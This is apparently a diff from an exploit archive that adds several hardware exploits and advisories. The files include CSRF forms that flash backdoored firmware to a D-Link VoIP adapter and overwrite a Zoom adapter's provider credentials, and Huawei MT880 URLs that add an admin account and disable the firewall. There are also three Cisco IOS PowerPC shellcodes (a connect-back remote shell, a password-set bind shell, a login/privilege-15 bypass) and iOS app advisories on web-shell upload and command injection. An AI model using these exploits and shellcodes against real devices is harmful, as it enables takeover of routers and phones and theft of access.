Other products/versions might be affected. Other products/versions might be affected.
Mitigation Mitigation
Vendor recommends to the following firmware version Vendor recommends to the following firmware version
Barracuda Spam Firewall (Firmware v3.5.12.001) Barracuda Spam Firewall (Firmware v3.5.12.001)
Alternatively, please contact Barracuda Networks for technical support. Alternatively, please contact Barracuda Networks for technical support.
Credits Credits
Dr. Marian Ventuneac, marian.ventuneac@ul.ie Dr. Marian Ventuneac, marian.ventuneac@ul.ie
Data Communication Security Laboratory, Department of Electronic & Computer Engineering, University of Limerick Data Communication Security Laboratory, Department of Electronic & Computer Engineering, University of Limerick
Disclaimer Disclaimer
Data Communication Security Laboratory releases this information with the vendor acceptance. Data Communication Security Laboratory releases this information with the vendor acceptance.
DCSL is not responsible for any malicious application of the information presented in this advisory. DCSL is not responsible for any malicious application of the information presented in this advisory.
# milw0rm.com [2008-12-16] # milw0rm.com [2008-12-16]

46
platforms/hardware/remote/7920.txt
View file

@ -1,23 +1,23 @@
D-link VoIP Phone Adapter XSS and XSRF(remote firmware overwrite) D-link VoIP Phone Adapter XSS and XSRF(remote firmware overwrite)
model number: DVG-2001s model number: DVG-2001s
f/w version 1.00.007 f/w version 1.00.007
Better than just remote code execution, you control the firmware. Better than just remote code execution, you control the firmware.
<html> <html>
<form action="http://10.1.1.166/Forms/cbi_Set_SW_Update?16640,0,0,0,0,0,0,0,0" <form action="http://10.1.1.166/Forms/cbi_Set_SW_Update?16640,0,0,0,0,0,0,0,0"
method="POST"> method="POST">
<input name="page_HiddenVar" value="0"> <input name="page_HiddenVar" value="0">
<input name="TFTPServerAddress1" value="10"> <input name="TFTPServerAddress1" value="10">
<input name="TFTPServerAddress2" value="1"> <input name="TFTPServerAddress2" value="1">
<input name="TFTPServerAddress3" value="1"> <input name="TFTPServerAddress3" value="1">
<input name="TFTPServerAddress4" value="1"> <input name="TFTPServerAddress4" value="1">
<input name="FirmwareUpdate" value="enabled"> <input name="FirmwareUpdate" value="enabled">
<input name="FileName" value="backdoored_firmware.img"> <input name="FileName" value="backdoored_firmware.img">
<input type=submit value="attack"> <input type=submit value="attack">
</form> </form>
</html> </html>
and xss which can be used for csrf bypass: and xss which can be used for csrf bypass:
http://10.1.1.166/Forms/page_CfgDevInfo_Set?%3Cscript%3Ealert(%22hacked%22)%3C/script%3E http://10.1.1.166/Forms/page_CfgDevInfo_Set?%3Cscript%3Ealert(%22hacked%22)%3C/script%3E
# milw0rm.com [2009-01-29] # milw0rm.com [2009-01-29]

50
platforms/hardware/remote/7921.txt
View file

@ -1,25 +1,25 @@
Written By Michael Brooks Written By Michael Brooks
Special thanks to str0ke! Special thanks to str0ke!
Zoom VoIP Phone Adapater ATA1+1 XSRF Zoom VoIP Phone Adapater ATA1+1 XSRF
voip provider change xsrf voip provider change xsrf
version 1.2.5 version 1.2.5
<html> <html>
<form action="http://10.1.1.165/callwzd.html" method=post> <form action="http://10.1.1.165/callwzd.html" method=post>
<input name=DIRTY_PAGE value=3> <input name=DIRTY_PAGE value=3>
<input name=HELP_PAGE value=html.html> <input name=HELP_PAGE value=html.html>
<input name=_voip_provider_1___provider_type value=1> <input name=_voip_provider_1___provider_type value=1>
<input name=_voip_provider_1___provider_name value=hacked_again> <input name=_voip_provider_1___provider_name value=hacked_again>
<input name=_voip_provider_1___display_name value=hacked_again> <input name=_voip_provider_1___display_name value=hacked_again>
<input name=_voip_provider_1___user_name value=hacked_again> <input name=_voip_provider_1___user_name value=hacked_again>
<input name=_voip_provider_1___auth_user_name value=hacked_again> <input name=_voip_provider_1___auth_user_name value=hacked_again>
<input name=_voip_provider_1___auth_user_password value=hacked_again> <input name=_voip_provider_1___auth_user_password value=hacked_again>
<input name=ipbx_fxo_local_areacode value=hacked_again> <input name=ipbx_fxo_local_areacode value=hacked_again>
<input name=ipbx_fxo_autodial_local_areacode value=hacked_again> <input name=ipbx_fxo_autodial_local_areacode value=hacked_again>
<input name=ipbx_fxo_autodial_digit_leng value=6> <input name=ipbx_fxo_autodial_digit_leng value=6>
<input name=BUTTON_FLASH value="Save+These+Settings"> <input name=BUTTON_FLASH value="Save+These+Settings">
<input type=submit> <input type=submit>
</form> </form>
</html> </html>
# milw0rm.com [2009-01-29] # milw0rm.com [2009-01-29]

74
platforms/hardware/remote/9503.txt
View file

@ -1,37 +1,37 @@
Description: Description:
Huawei MT880 is a device offered by the algerian telecom operator - Huawei MT880 is a device offered by the algerian telecom operator -
FAWRI, to provide ADSL Internet connexion and it's already widely in use. FAWRI, to provide ADSL Internet connexion and it's already widely in use.
Overview: Overview:
Huawei MT880 firmware and its default configuration has flaws, which Huawei MT880 firmware and its default configuration has flaws, which
allows LAN users to gain unauthorized full access to device. allows LAN users to gain unauthorized full access to device.
Here are just limited PoCs. Here are just limited PoCs.
Default credentials on the web-based management interface: Default credentials on the web-based management interface:
admin/admin admin/admin
Possible XSRFs: Possible XSRFs:
Adding an administrator user: Adding an administrator user:
http://admin:admin@192.168.1.1/Action?user_id=jerome&priv=1&pass1=jerome&pass2=jerome&id=70 http://admin:admin@192.168.1.1/Action?user_id=jerome&priv=1&pass1=jerome&pass2=jerome&id=70
Disabling firewall/anti-DoS... features: Disabling firewall/anti-DoS... features:
http://admin:admin@192.168.1.1/Action?blacklisting_status=1&bl_list=10&attack_status=0&dos_status=0&id=42&max_tcp=25&max_icmp=25&max_host=70 http://admin:admin@192.168.1.1/Action?blacklisting_status=1&bl_list=10&attack_status=0&dos_status=0&id=42&max_tcp=25&max_icmp=25&max_host=70
Adding a MAC address to the whitelist: Adding a MAC address to the whitelist:
http://admin:admin@192.168.1.1/Action?insrcmac66=123456789123&inblocksrcmac66=1&insrcmac67=000000000000&inblocksrcmac67=1&insrcmac68=000000000000&inblocksrcmac68=1&insrcmac69=000000000000&inblocksrcmac69=1&insrcmac70=000000000000&inblocksrcmac70=1&insrcmac71=000000000000&inblocksrcmac71=1&insrcmac72=000000000000&inblocksrcmac72=1&insrcmac73=000000000000&inblocksrcmac73=1&insrcmac74=000000000000&inblocksrcmac74=1&insrcmac75=000000000000&inblocksrcmac75=1&insrcmac76=000000000000&inblocksrcmac76=1&insrcmac77=000000000000&inblocksrcmac77=1&insrcmac78=000000000000&inblocksrcmac78=1&insrcmac79=000000000000&inblocksrcmac79=1&insrcmac80=000000000000&inblocksrcmac80=1&insrcmac81=000000000000&inblocksrcmac81=1&id=104 http://admin:admin@192.168.1.1/Action?insrcmac66=123456789123&inblocksrcmac66=1&insrcmac67=000000000000&inblocksrcmac67=1&insrcmac68=000000000000&inblocksrcmac68=1&insrcmac69=000000000000&inblocksrcmac69=1&insrcmac70=000000000000&inblocksrcmac70=1&insrcmac71=000000000000&inblocksrcmac71=1&insrcmac72=000000000000&inblocksrcmac72=1&insrcmac73=000000000000&inblocksrcmac73=1&insrcmac74=000000000000&inblocksrcmac74=1&insrcmac75=000000000000&inblocksrcmac75=1&insrcmac76=000000000000&inblocksrcmac76=1&insrcmac77=000000000000&inblocksrcmac77=1&insrcmac78=000000000000&inblocksrcmac78=1&insrcmac79=000000000000&inblocksrcmac79=1&insrcmac80=000000000000&inblocksrcmac80=1&insrcmac81=000000000000&inblocksrcmac81=1&id=104
Adding an IP address allowed by the firewall: Adding an IP address allowed by the firewall:
http://admin:admin@192.168.1.1/Action?ip_1=192&ip_2=168&ip_3=1&ip_4=2&mask_1=255&mask_2=255&mask_3=255&mask_4=255&gateway_1=192&gateway_2=168&gateway_3=1&gateway_4=1&id=7 http://admin:admin@192.168.1.1/Action?ip_1=192&ip_2=168&ip_3=1&ip_4=2&mask_1=255&mask_2=255&mask_3=255&mask_4=255&gateway_1=192&gateway_2=168&gateway_3=1&gateway_4=1&id=7
Over flaws are not covered in this advisory. Over flaws are not covered in this advisory.
Cheers Cheers
/JA /JA
# milw0rm.com [2009-08-24] # milw0rm.com [2009-08-24]

268
platforms/hardware/shellcode/13291.txt
View file

@ -1,135 +1,135 @@
# ---------------------------------------------------------------------------------------- # ----------------------------------------------------------------------------------------
# #
# Cisco IOS Connectback shellcode v1.0 # Cisco IOS Connectback shellcode v1.0
# (c) 2007 IRM Plc # (c) 2007 IRM Plc
# By Gyan Chawdhary # By Gyan Chawdhary
# #
# ---------------------------------------------------------------------------------------- # ----------------------------------------------------------------------------------------
# #
# The code creates a new TTY, allocates a shell with privilege level 15 and connects back # The code creates a new TTY, allocates a shell with privilege level 15 and connects back
# on port 21 # on port 21
# #
# This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device. # This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device.
# #
# #
# The following five hard-coded addresses must be located for the target IOS version. # The following five hard-coded addresses must be located for the target IOS version.
# #
# The hard-coded addresses used here are for: # The hard-coded addresses used here are for:
# #
# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2) # IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2)
# #
# ---------------------------------------------------------------------------------------- # ----------------------------------------------------------------------------------------
.equ malloc, 0x804785CC .equ malloc, 0x804785CC
.equ allocate_tty, 0x803d155c .equ allocate_tty, 0x803d155c
.equ ret, 0x804a42e8 .equ ret, 0x804a42e8
.equ addr, 0x803c4ad8 .equ addr, 0x803c4ad8
.equ str, 0x81e270b4 .equ str, 0x81e270b4
.equ tcp_connect, 0x80567568 .equ tcp_connect, 0x80567568
.equ tcp_execute_command, 0x8056c354 .equ tcp_execute_command, 0x8056c354
.equ login, 0x8359b1f4 .equ login, 0x8359b1f4
.equ god, 0xff100000 .equ god, 0xff100000
.equ priv, 0x8359be64 .equ priv, 0x8359be64
# ---------------------------------------------------------------------------------------- # ----------------------------------------------------------------------------------------
main: main:
stwu 1,-48(1) stwu 1,-48(1)
mflr 0 mflr 0
stw 31,44(1) stw 31,44(1)
stw 0,52(1) stw 0,52(1)
mr 31,1 mr 31,1
li 3,512 li 3,512
lis 9,malloc@ha #malloc() memory for tcp structure lis 9,malloc@ha #malloc() memory for tcp structure
la 9,malloc@l(9) la 9,malloc@l(9)
mtctr 9 mtctr 9
bctrl bctrl
mr 0,3 mr 0,3
stw 0,20(31) stw 0,20(31)
lwz 9,12(31) lwz 9,12(31)
li 0,1 li 0,1
stb 0,0(9) stb 0,0(9)
lwz 9,12(31) lwz 9,12(31)
lis 0,0xac1e # connect back ip address lis 0,0xac1e # connect back ip address
ori 0,0,1018 # ori 0,0,1018 #
stw 0,4(9) stw 0,4(9)
li 3,66 li 3,66
li 4,0 li 4,0
lis 9,allocate_tty@ha # allocate new TTY lis 9,allocate_tty@ha # allocate new TTY
la 9,allocate_tty@l(9) la 9,allocate_tty@l(9)
mtctr 9 mtctr 9
bctrl bctrl
addi 0,31,24 addi 0,31,24
# Fix TTY structure to enable level 15 shell without password # Fix TTY structure to enable level 15 shell without password
# #
# #
########################################################## ##########################################################
# login patch begin # login patch begin
lis 9, login@ha lis 9, login@ha
la 9, login@l(9) la 9, login@l(9)
li 8,0 li 8,0
stw 8, 0(9) stw 8, 0(9)
# login patch end # login patch end
#IDA placeholder for con0 #IDA placeholder for con0
# #
# lis %r9, ((stdio+0x10000)@h) # lis %r9, ((stdio+0x10000)@h)
# lwz %r9, stdio@l(%r9) # lwz %r9, stdio@l(%r9)
# lwz %r0, 0xDE4(%r9) #priv struct # lwz %r0, 0xDE4(%r9) #priv struct
# #
# priv patch begin # priv patch begin
lis 9, priv@ha lis 9, priv@ha
la 9, priv@l(9) la 9, priv@l(9)
lis 8, god@ha lis 8, god@ha
la 8, god@l(8) la 8, god@l(8)
stw 8, 0(9) stw 8, 0(9)
# priv patch end # priv patch end
########################################################### ###########################################################
li 3,0 li 3,0
li 4,21 # Port 21 for connectback li 4,21 # Port 21 for connectback
lwz 5,12(31) lwz 5,12(31)
li 6,0 li 6,0
li 7,0 li 7,0
mr 8,0 mr 8,0
li 9,0 li 9,0
lis 11,tcp_connect@ha # Connect to attacker IP lis 11,tcp_connect@ha # Connect to attacker IP
la 11,tcp_connect@l(11) la 11,tcp_connect@l(11)
mtctr 11 mtctr 11
bctrl bctrl
mr 0,3 mr 0,3
stw 0,20(31) stw 0,20(31)
li 3,66 li 3,66
lwz 4,20(31) lwz 4,20(31)
li 5,0 li 5,0
li 6,0 li 6,0
li 7,0 li 7,0
li 8,0 li 8,0
li 9,0 li 9,0
li 10,0 li 10,0
lis 11,tcp_execute_command@ha # Execute Virtual Terminal on outgoing connection, similar to /bin/bash lis 11,tcp_execute_command@ha # Execute Virtual Terminal on outgoing connection, similar to /bin/bash
la 11,tcp_execute_command@l(11) la 11,tcp_execute_command@l(11)
mtctr 11 mtctr 11
bctrl bctrl
lwz 11,0(1) lwz 11,0(1)
lwz 0,4(11) lwz 0,4(11)
mtlr 0 mtlr 0
lwz 31,-4(11) lwz 31,-4(11)
mr 1,11 mr 1,11
########################################### ###########################################
lis 9, addr@ha lis 9, addr@ha
addi 0, 9, addr@l addi 0, 9, addr@l
mtctr 0 mtctr 0
xor 3,3,3 xor 3,3,3
addi 3,0, -2 addi 3,0, -2
lis 10, str@ha lis 10, str@ha
addi 4, 10, str@l addi 4, 10, str@l
bctrl bctrl
lis 10, ret@ha lis 10, ret@ha
addi 4, 10, ret@l addi 4, 10, ret@l
mtctr 4 mtctr 4
bctrl bctrl
# milw0rm.com [2008-08-13] # milw0rm.com [2008-08-13]

128
platforms/hardware/shellcode/13292.txt
View file

@ -1,65 +1,65 @@
# ---------------------------------------------------------------------------------------- # ----------------------------------------------------------------------------------------
# #
# Cisco IOS Bind shellcode v1.0 # Cisco IOS Bind shellcode v1.0
# (c) 2007 IRM Plc # (c) 2007 IRM Plc
# By Varun Uppal # By Varun Uppal
# #
# ---------------------------------------------------------------------------------------- # ----------------------------------------------------------------------------------------
# #
# The code creates a new VTY, allocates a password then sets the privilege level to 15 # The code creates a new VTY, allocates a password then sets the privilege level to 15
# #
# This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device. # This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device.
# Once assembled, the payload is only 116 bytes in length # Once assembled, the payload is only 116 bytes in length
# #
# The following four hard-coded addresses must be located for the target IOS version. # The following four hard-coded addresses must be located for the target IOS version.
# Version 1.1 of the shellcode will auto-locate these values and make the code # Version 1.1 of the shellcode will auto-locate these values and make the code
# IOS-version-independent # IOS-version-independent
# #
# The hard-coded addresses used here are for: # The hard-coded addresses used here are for:
# #
# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2) # IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2)
# #
# ---------------------------------------------------------------------------------------- # ----------------------------------------------------------------------------------------
.equ makenewvty, 0x803d0d08 .equ makenewvty, 0x803d0d08
.equ malloc, 0x804785cc .equ malloc, 0x804785cc
.equ setpwonline, 0x803b9e90 .equ setpwonline, 0x803b9e90
.equ linesstruct, 0x82f9e334 .equ linesstruct, 0x82f9e334
# ---------------------------------------------------------------------------------------- # ----------------------------------------------------------------------------------------
.equ priv, 0xf1000000 #value used to set the privilege level .equ priv, 0xf1000000 #value used to set the privilege level
main: li 3,71 #new vty line = 71 main: li 3,71 #new vty line = 71
lis 9,makenewvty@ha lis 9,makenewvty@ha
la 9,makenewvty@l(9) la 9,makenewvty@l(9)
mtctr 9 mtctr 9
bctrl #makenewvty() bctrl #makenewvty()
li 3,0x1e5c li 3,0x1e5c
lis 9,malloc@ha lis 9,malloc@ha
la 9,malloc@l(9) la 9,malloc@l(9)
mtctr 9 mtctr 9
bctrl #malloc() memory for structure bctrl #malloc() memory for structure
li 4,70 li 4,70
stw 4,0xa68(3) stw 4,0xa68(3)
li 5,72 li 5,72
stw 5,0xa6c(3) stw 5,0xa6c(3)
li 4,0x00 li 4,0x00
bl setp #pointer to the password into LR bl setp #pointer to the password into LR
.string "1rmp455" #the password for the line .string "1rmp455" #the password for the line
setp: mflr 5 setp: mflr 5
lis 9,setpwonline@ha lis 9,setpwonline@ha
la 9,setpwonline@l(9) la 9,setpwonline@l(9)
mtctr 9 mtctr 9
bctrl #setpwonline() bctrl #setpwonline()
lis 8,linesstruct@ha lis 8,linesstruct@ha
la 8,linesstruct@l(8) la 8,linesstruct@l(8)
lwz 9,0(8) lwz 9,0(8)
lis 7,priv@ha lis 7,priv@ha
la 7,priv@l(7) la 7,priv@l(7)
stw 7,0xde4(9) #set privilege level to 15 stw 7,0xde4(9) #set privilege level to 15
# milw0rm.com [2008-08-13] # milw0rm.com [2008-08-13]

98
platforms/hardware/shellcode/13293.txt
View file

@ -1,50 +1,50 @@
# ---------------------------------------------------------------------------------------- # ----------------------------------------------------------------------------------------
# #
# Cisco IOS Tiny shellcode v1.0 # Cisco IOS Tiny shellcode v1.0
# (c) 2007 IRM Plc # (c) 2007 IRM Plc
# By Gyan Chawdhary # By Gyan Chawdhary
# #
# ---------------------------------------------------------------------------------------- # ----------------------------------------------------------------------------------------
# #
# The code creates a new TTY, and sets the privilege level to 15 without a password # The code creates a new TTY, and sets the privilege level to 15 without a password
# #
# This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device. # This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device.
# #
# #
# The following two hard-coded addresses must be located for the target IOS version. # The following two hard-coded addresses must be located for the target IOS version.
# #
# The hard-coded addresses used here are for: # The hard-coded addresses used here are for:
# #
# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2) # IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2)
# #
# ---------------------------------------------------------------------------------------- # ----------------------------------------------------------------------------------------
.equ ret, 0x804a42e8 .equ ret, 0x804a42e8
.equ login, 0x8359b1f4 .equ login, 0x8359b1f4
.equ god, 0xff100000 .equ god, 0xff100000
.equ priv, 0x8359be64 .equ priv, 0x8359be64
# ---------------------------------------------------------------------------------------- # ----------------------------------------------------------------------------------------
main: main:
# login patch begin # login patch begin
lis 9, login@ha lis 9, login@ha
la 9, login@l(9) la 9, login@l(9)
li 8,0 li 8,0
stw 8, 0(9) stw 8, 0(9)
# login patch end # login patch end
# priv patch begin # priv patch begin
lis 9, priv@ha lis 9, priv@ha
la 9, priv@l(9) la 9, priv@l(9)
lis 8, god@ha lis 8, god@ha
la 8, god@l(8) la 8, god@l(8)
stw 8, 0(9) stw 8, 0(9)
# priv patch end # priv patch end
# exit code # exit code
lis 10, ret@ha lis 10, ret@ha
addi 4, 10, ret@l addi 4, 10, ret@l
mtctr 4 mtctr 4
bctrl bctrl
# milw0rm.com [2008-08-13] # milw0rm.com [2008-08-13]

271
platforms/hardware/webapps/30031.txt Executable file
View file

@ -0,0 +1,271 @@
Document Title:
===============
Imagam iFiles v1.16.0 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1160
Release Date:
=============
2013-12-03
Vulnerability Laboratory ID (VL-ID):
====================================
1160
Common Vulnerability Scoring System:
====================================
8.9
Product & Service Introduction:
===============================
iFiles is the most intuitive file manager for iOS with features like connectivity to many file cloud services,
transferring files between computer or cloud services, ability to view many file formats (PDF viewer now
supports annotations, search and more), voice recorder, web downloader, text file editor and more.
Supported Online Cloud Services and Protocols: Dropbox, Google Drive, iCloud, Box.net, SkyDrive, SugarSync, AFP
(Mac Shares), FTP/FTPS, SFTP, Flickr, Picasa, Facebook, Rackspace CloudFiles, CloudApp, PogoPlug, WebDav, Amazon
S3, Ubuntu One Files, ownCloud, 4Shared, also using Amazon S3: DreamObjects and UltiCloud.
( Copy of the Homepage: https://itunes.apple.com/de/app/ifiles/id336683524 & http://imagam.com )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official Imagam iFiles v1.16.0 mobile application for apple iOS.
Vulnerability Disclosure Timeline:
==================================
2013-12-03: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Imagam
Product: iFiles - Mobile Application iOS 1.16.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
================================
1.1
A file include- & arbitrary file upload web vulnerability has been discovered in the official Imagam iFiles v1.16.0 mobile application for apple iOS.
An arbitrary file upload issue allows a remote attacker to upload files with multiple extensions to bypass the validation for unauthorized access.
A file include web vulnerability allows a remote attacker to unauthorized include local web-server file requests or external file requests.
The vulnerability is located in the vulnerable file- and folder-name value. Remote attackers can include local file requests combined with script code
to successful exploit the issue. To include to the vulnerable foldername value it is required to manipulate the `create folder` (add) input (POST Method).
The secound possibility to inject is the vulnerable filename value of the misconfigured (POST Method) upload module. After the include the remote attacker
can access the included file by requesting the regular index or sub category folder (web interface) site.
The arbitrary file upload vulnerability is located in the vulnerable filename value of the upload module. Attackers are also able to upload a php or js
web-shells by renaming the file with multiple extensions. The attacker uploads for example a web-shell with the following name and extension
test.jpg.html.js.php.gif.jpg . After the upload the attacker opens the file in the web application to delete the .gif.jpg file extension to access the
resource with elevated execution access rights.
Exploitation of the file include & arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password.
Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] File Upload
Vulnerable Parameter(s):
[+] filename (value) - (multiple extensions)
[+] foldername
Affected Module(s):
[+] File & Folder Dir Listing (http://localhost:8080)
1.2
2 local command/path injection web vulnerabilities has been discovered in the official Imagam iFiles v1.16.0 mobile application for apple iOS.
The remote web vulnerability allows to inject local commands via vulnerable system values to compromise the apple mobile iOS application.
The vulnerability is located in the in the device name value of the file dir und sub category listing module. Local attackers are able to inject
own malicious system specific commands or path values requests as the iOS device name. The execute of the injected script code occurs in two
different section with persistent attack vector. The first section is the wifi app web-interface index file/folder dir listing. The secound
execute occurs in the file/folder sub category listing. The security risk of the local command/path inject vulnerability is estimated as high(-)
with a cvss (common vulnerability scoring system) count of 6.2(+)|(-)6.3.
Exploitation of the command/path inject vulnerability requires a low privileged iOS device account with restricted access and no user interaction.
Successful exploitation of the vulnerability results in unauthorized execute of system specific commands or unauthorized path requests.
Request Method(s):
[+] POST to GET
Vulnerable Parameter(s):
[+] devicename
Affected Module(s):
[+] Index- File Dir Listing
[+] Sub Folder/Category - File Dir Listing
Proof of Concept (PoC):
=======================
1.1
The file include and arbitrary file upload web vulnerability can be exploited by remote attackers without privileged web application
user account and also without user interaction. For security demonstration or to reproduce the vulnerability follow the provided
information and steps below.
PoC: foldername
<div id="headerHighlight">
<div id="header">
<div class="logo">
<img src="_device%20folder&path-issue-1_files/icon57.png" alt="icon57" height="57" width="57">
<h1>iFiles</h1>
</div>
<div class="deviceName">
<h4>device bkm337? </h4>
</div>
<div class="urlDiv">
<div class="outer">
<div class="inner">
<b>/>"<[FILE INCLUDE WEB VULNERABILITY!]%22"_device%20folder&[FILE INCLUDE WEB VULNERABILITY!]%22">x.com/</b>
</div>
</div>
</div>
</div>
</div>
</div>
PoC: filename (value)
<tr id="sfile0" url="/" filename="<EMBED SRC=" data:image"="">
<td class="fileName">
<a href="http://192.168.2.106:8080/%3CEMBED%20SRC=" data:image"=""><img class="fileIcon"
src="_device%20folder&path-issue-2_files/FolderIcon.png" alt="*">
<embed src="data:image%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%09%09%09%09%3C/
a%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%09%09%09%3C/td%3E%0A%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%09%09%09%3Ctd%20class=" filelastmod"="">Mon, 02 Dec 2013 15:50:10 GMT</a></td>
<td class="fileSize" align="right">--
<img style="display:none;" class="downloadIcon" src="_device%20folder&path-issue-2_files/downloadIcon.png"
alt="d" onclick="downloadFile('/<EMBED SRC=" data:image');"="">
<img class="deleteIcon" src="_device%20folder&path-issue-2_files/deleteIcon.png" alt="x"
title="Delete this file" onclick="deleteFile('#sfile0');" ="cursor:pointer;"="">
</td>
</tr>
<tr id="sfile1" url="/" filename="[FILE INCLUDE WEB VULNERABILITY!]%22">
<td class="fileName">
<a href="http://192.168.2.106:8080/%3E" <[FILE INCLUDE WEB VULNERABILITY!]%22"><img class="fileIcon"
src="_device%20folder&path-issue-2_files/FolderIcon.png" alt="*">
>"<[FILE INCLUDE WEB VULNERABILITY!]="_device%20folder&path-issue-2_files/a.htm" <="" a="">
</td>
1.2
The local command inject web vulnerability can be exploited by remote attackers with low privileged or restricted iOS device user account
and no user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below.
PoC: devicename
<div id="headerHighlight">
<div id="header">
<div class="logo">
<img src="device%20name__files/icon57.png" alt="icon57" height="57" width="57">
<h1>iFiles</h1>
</div>
<div class="deviceName">
<h4>d4vice><..[COMMAND/PATH INJECT VULNERABILITY!] </h4>
</div>
<div class="urlDiv">
<div class="outer">
<div class="inner">
<b>/</b>
</div>
</div>
</div>
</div>
</div>
Solution - Fix & Patch:
=======================
1.1
The file include vulnerability and arbitrary file upload vulnerability can be patched by a secure parse and encode of the vulnerable
filename and foldername values.
Encode also the vulnerable path sub category file dir listing and the index file dir listing. Recognize the path value.
1.2
To patch the local command inject web vulnerability it is required to encode the deviename value in the index and sub category sites
to prevent injects or requests.
Security Risk:
==============
1.1
The security risk of the file include and arbitrary file upload (restricted upload bypass) web vulnerability is estimated as critical.
1.2
The security risk of the local command/path inject web vulnerability is estimated as high(-).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

191
platforms/hardware/webapps/30055.txt Executable file
View file

@ -0,0 +1,191 @@
Document Title:
===============
Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1152
Release Date:
=============
2013-12-04
Vulnerability Laboratory ID (VL-ID):
====================================
1152
Common Vulnerability Scoring System:
====================================
6.7
Product & Service Introduction:
===============================
Wireless Transfer App is an easy to use photo and video transfer tool. It helps you easily and quickly transfer photos and videos
between iPhone and iPad, as well as transfer photos and videos from computer to iPad/iPhone/iPod and vice verse. With Wireless
Transfer App, you can transfer photos and videos from iPad to iPad, from iPad to iPhone, from iPhone to iPad, from iPhone to iPhone,
from computer to iPad, from iPhone to computer and more. There is no need for USB cable or extra software. You just need to put your
devices under the same Wi-Fi network.
(Copy of the Homepage: https://itunes.apple.com/en/app/wireless-transfer-app-share/id543119010 & http://www.wirelesstransferapp.com/ )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple command/path inject vulnerabilities in the Wireless Transfer App v3.7 for apple iOS.
Vulnerability Disclosure Timeline:
==================================
2012-11-30: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Wireless Transfer App COM
Product: Wireless Transfer App 3.7
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A local command/path injection web vulnerability has been discovered in the Wireless Transfer App v3.7 for apple iOS.
The vulnerability allows to inject local commands via vulnerable system values to compromise the apple mobile iOS application.
The vulnerability is located in the in the album name value of the wireless transfer app index and sub category list module.
Remote attackers are able to manipulate iOS device - `photo app` (default) album names. The execute of the injected
command/path request occurs in the album sub category list and the main album name index list. The security risk of the
command/path inject vulnerabilities are estimated as high(-) with a cvss (common vulnerability scoring system) count of 6.7(-).
Exploitation of the command/path inject vulnerability requires a local low privileged iOS device account with restricted access
and no direct user interaction. Successful exploitation of the vulnerability results unauthorized execution of system specific
commands or unauthorized path requests.
Vulnerable Application(s):
[+] Wireless Transfer App v3.7
Vulnerable Parameter(s):
[+] album name
[+] photoGallery_head - album
Affected Module(s):
[+] Index - Album Name List
[+] Sub Category - Title Album Name List
Proof of Concept (PoC):
=======================
The local command inject web vulnerabilities can be exploited by local low privileged device user accounts with low
user interaction. For security demonstration or to reproduce the vulnerability follow the information and steps below.
Manual steps to exploit the vulnerability ...
1. Install the wireless transfer v3.7 iOS mobile application
2. Open the default Photo app of your iOS device
